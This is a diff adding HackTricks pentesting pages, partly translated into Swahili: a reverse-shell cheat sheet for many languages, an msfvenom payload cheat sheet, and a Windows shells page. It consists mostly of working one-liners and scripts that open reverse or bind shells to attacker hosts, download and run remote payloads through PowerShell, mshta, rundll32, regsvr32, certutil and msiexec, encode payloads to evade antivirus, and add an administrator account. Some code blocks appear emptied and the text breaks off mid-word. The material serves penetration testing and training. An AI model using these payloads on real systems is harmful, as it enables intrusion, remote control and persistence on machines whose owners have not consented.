RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +#IPv6 +python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' +``` +## Perl +```bash +perl -e 'use Socket;$i="";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## PHP +```php +// Using 'exec' is the most common method, but assumes that the file descriptor will be 3. +// Using this method may lead to instances where the connection reaches out to the listener and then closes. +php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' + +// Using 'proc_open' makes no assumptions about what the file descriptor will be. +// See https://security.stackexchange.com/a/198944 for more information +$sock, 1=>$sock, 2=>$sock), $pipes); ?> + +/dev/tcp/10.10.14.8/4444 0>&1'"); ?> +``` +## Java +```bash +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` +## Ncat +```bash +victim> ncat --ssl -c "bash -i 2>&1" +attacker> ncat -l --ssl +``` +## Golang +```bash +echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go +``` +## Lua +```bash +#Linux +lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" +#Windows & Linux +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## NodeJS +```javascript +(function(){ +var net = require("net"), +cp = require("child_process"), +sh = cp.spawn("/bin/sh", []); +var client = new net.Socket(); +client.connect(8080, "10.17.26.64", function(){ +client.pipe(sh.stdin); +sh.stdout.pipe(client); +sh.stderr.pipe(client); +}); +return /a/; // Prevents the Node.js application form crashing +})(); + + +or + +require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') +require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'") + +or + +-var x = global.process.mainModule.require +-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') + +or + +// If you get to the constructor of a function you can define and execute another function inside a string +"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() +"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() + + +or + +// Abuse this syntax to get a reverse shell +var fs = this.process.binding('fs'); +var fs = process.binding('fs'); + +or + +https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py +``` +## OpenSSL + +Mshambuliaji (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Mtu Aliyeathiriwa +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## **Socat** + +[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) + +### Bind shell +```bash +victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane +attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 +``` +### Reverse shell +```bash +attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 +victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane +``` +## Awk +```bash +awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +``` +## Kidole + +**Mshambuliaji** +```bash +while true; do nc -l 79; done +``` +Ili kutuma amri, iandike, bonyeza enter na bonyeza CTRL+D (kuacha STDIN) + +**Victim** +```bash +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null')`; sleep 1; done + +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done +``` +## Gawk +```bash +#!/usr/bin/gawk -f + +BEGIN { +Port = 8080 +Prompt = "bkd> " + +Service = "/inet/tcp/" Port "/0/0" +while (1) { +do { +printf Prompt |& Service +Service |& getline cmd +if (cmd) { +while ((cmd |& getline) > 0) +print $0 |& Service +close(cmd) +} +} while (cmd != "exit") +close(Service) +} +} +``` +## Xterm + +Hii itajaribu kuungana na mfumo wako kwenye bandari 6001: +```bash +xterm -display 10.0.0.1:1 +``` +Ili kupata reverse shell unaweza kutumia (ambayo itasikiliza kwenye bandari 6001): +```bash +# Authorize host +xhost +targetip +# Listen +Xnest :1 +``` +## Groovy + +by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) KUMBUKA: Java reverse shell pia inafanya kazi kwa Groovy +```bash +String host="localhost"; +int port=8044; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); +``` +## References + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell) +* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) + +**Jaribu Kikundi cha Usalama** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +Jifunze & fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze & fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md new file mode 100644 index 000000000..7d7dd4bd9 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/msfvenom.md @@ -0,0 +1,240 @@ +# MSFVenom - CheatSheet + +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} + +
+ +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na hunters wa bug bounty! + +**Uelewa wa Hacking**\ +Shiriki na maudhui yanayoangazia msisimko na changamoto za hacking + +**Habari za Hack kwa Wakati Halisi**\ +Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na uelewa wa wakati halisi + +**Matangazo ya Hivi Punde**\ +Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa + +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! + +*** + +## Msingi msfvenom + +`msfvenom -p -e -f -i LHOST=` + +Mtu anaweza pia kutumia `-a` kubaini usanifu au `--platform` + +## Orodha +```bash +msfvenom -l payloads #Payloads +msfvenom -l encoders #Encoders +``` +## Paramu za kawaida wakati wa kuunda shellcode +```bash +-b "\x00\x0a\x0d" +-f c +-e x86/shikata_ga_nai -i 5 +EXITFUNC=thread +PrependSetuid=True #Use this to create a shellcode that will execute something with SUID +``` +## **Windows** + +### **Reverse Shell** + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe +``` +{% endcode %} + +### Bind Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe +``` +{% endcode %} + +### Unda Mtumiaji + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe +``` +{% endcode %} + +### CMD Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe +``` +### **Teua Amri** + +{% code overflow="wrap" %} +```bash +msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe +msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe +``` +### Encoder + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe +``` +{% endcode %} + +### Imejumuishwa ndani ya executable + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe +``` +{% endcode %} + +## Linux Payloads + +### Reverse Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf +msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf +``` +{% endcode %} + +### Bind Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf +``` +### SunOS (Solaris) + +{% code overflow="wrap" %} +```bash +msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf +``` +{% endcode %} + +## **MAC Payloads** + +### **Reverse Shell:** + +{% code overflow="wrap" %} +```bash +msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho +``` +### **Bind Shell** +```bash +msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho +``` +{% endcode %} + +## **Web Based Payloads** + +### **PHP** + +#### Reverse shel**l** +```bash +msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +``` +{% endcode %} + +### ASP/x + +#### Reverse shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx +``` +{% endcode %} + +### JSP + +#### Reverse shell + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp +``` +{% endcode %} + +### WAZI + +#### Reverse Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war +``` +{% endcode %} + +### NodeJS +```bash +msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) +``` +## **Script Language payloads** + +### **Perl** + +{% code overflow="wrap" %} +```bash +msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl +``` +### **Python** +```bash +msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py +``` +### **Bash** +```bash +msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh +``` +{% endcode %} + +
+ +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! + +**Uelewa wa Udukuzi**\ +Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi + +**Habari za Udukuzi za Wakati Halisi**\ +Baki na habari za hivi punde katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi + +**Matangazo ya Hivi Punde**\ +Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa + +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! + +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/windows.md b/generic-methodologies-and-resources/reverse-shells/windows.md new file mode 100644 index 000000000..76470bdc8 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/windows.md @@ -0,0 +1,506 @@ +# Shells - Windows + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Try Hard Security Group** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +## Lolbas + +Ukurasa [lolbas-project.github.io](https://lolbas-project.github.io/) ni wa Windows kama [https://gtfobins.github.io/](https://gtfobins.github.io/) ni wa linux.\ +Kwa wazi, **hakuna faili za SUID au ruhusa za sudo katika Windows**, lakini ni muhimu kujua **jinsi** baadhi ya **binaries** zinaweza (kutumika) kutekeleza aina fulani ya vitendo visivyotarajiwa kama **kutekeleza msimbo wa kawaida.** + +## NC +```bash +nc.exe -e cmd.exe +``` +## NCAT +mhasiriwa +``` +ncat.exe -e "cmd.exe /c (cmd.exe 2>&1)" +#Encryption to bypass firewall +ncat.exe --ssl -e "cmd.exe /c (cmd.exe 2>&1)" +``` +mshambuliaji +``` +ncat -l +#Encryption to bypass firewall +ncat -l --ssl +``` +## SBD + +**[sbd](https://www.kali.org/tools/sbd/) ni mbadala wa Netcat unaoweza kubebeka na salama**. Inafanya kazi kwenye mifumo ya Unix kama na Win32. Ikiwa na vipengele kama vile usimbuaji mzito, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na kuunganishwa tena mara kwa mara, sbd inatoa suluhisho la kubadilika kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka kwa usambazaji wa Kali Linux linaweza kutumika kama mbadala wa kuaminika wa Netcat. +```bash +# Victims machine +sbd -l -p 4444 -e bash -v -n +listening on port 4444 + + +# Atackers +sbd 10.10.10.10 4444 +id +uid=0(root) gid=0(root) groups=0(root) +``` +## Python +```bash +#Windows +C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +``` +## Perl +```bash +perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +#Windows +ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## Lua +```bash +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## OpenSSH + +Mshambuliaji (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Mtu aliyeathirika +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## Powershell +```bash +powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" +powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" +Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" +echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile +``` +Mchakato unaofanya wito wa mtandao: **powershell.exe**\ +Payload imeandikwa kwenye diski: **HAPANA** (_angalau mahali popote ambapo ningeweza kupata kwa kutumia procmon !_ ) +```bash +powershell -exec bypass -f \\webdavserver\folder\payload.ps1 +``` +Mchakato unaofanya wito wa mtandao: **svchost.exe**\ +Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache** + +**Mstari mmoja:** +```bash +$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` +**Pata maelezo zaidi kuhusu Shells tofauti za Powershell mwishoni mwa hati hii** + +## Mshta + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) +``` + +```bash +mshta http://webserver/payload.hta +``` + +```bash +mshta \\webdavserver\folder\payload.hta +``` +#### **Mfano wa hta-psh reverse shell (tumia hta kupakua na kutekeleza PS backdoor)** +```xml + +``` +**Unaweza kupakua na kutekeleza kwa urahisi sana zombie ya Koadic ukitumia stager hta** + +#### mfano wa hta + +[**Kutoka hapa**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) +```xml + + + + + + + + + +``` +#### **mshta - sct** + +[**Kutoka hapa**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + + +``` +#### **Mshta - Metasploit** +```bash +use exploit/windows/misc/hta_server +msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > exploit +``` + +```bash +Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit +``` +**Imegunduliwa na mlinzi** + + + + +## **Rundll32** + +[**Mfano wa Dll hello world**](https://github.com/carterjones/hello-world-dll) + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +rundll32 \\webdavserver\folder\payload.dll,entrypoint +``` + +```bash +rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); +``` +**Imegunduliwa na mlinzi** + +**Rundll32 - sct** + +[**Kutoka hapa**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + +``` +#### **Rundll32 - Metasploit** +```bash +use windows/smb/smb_delivery +run +#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 +``` +**Rundll32 - Koadic** +```bash +use stager/js/rundll32_js +set SRVHOST 192.168.1.107 +set ENDPOINT sales +run +#Koadic will tell you what you need to execute inside the victim, it will be something like: +rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); +``` +## Regsvr32 + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll +``` + +``` +regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll +``` +**Imepatikana na mlinzi** + +#### Regsvr32 -sct + +[**Kutoka hapa**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) +```markup + + + + + + + + +``` +#### **Regsvr32 - Metasploit** +```bash +use multi/script/web_delivery +set target 3 +set payload windows/meterpreter/reverse/tcp +set lhost 10.2.0.5 +run +#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll +``` +**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager regsvr** + +## Certutil + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) + +Pakua B64dll, ikode na uitekeleze. +```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll +``` +Pakua B64exe, ikode na uiendeshe. +```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe +``` +**Imepatikana na mlinzi** + + +## **Cscript/Wscript** +```bash +powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" +``` +**Cscript - Metasploit** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs +``` +**Imepatikana na mlinzi** + +## PS-Bat +```bash +\\webdavserver\folder\batchfile.bat +``` +Mchakato unaofanya wito wa mtandao: **svchost.exe**\ +Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat +impacket-smbserver -smb2support kali `pwd` +``` + +```bash +\\10.8.0.3\kali\shell.bat +``` +**Imepatikana na mlinzi** + +## **MSIExec** + +Mshambuliaji +``` +msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi +python -m SimpleHTTPServer 80 +``` +Mtu aliyeathirika: +``` +victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi +``` +**Imepatikana** + +## **Wmic** + +* [Kutoka 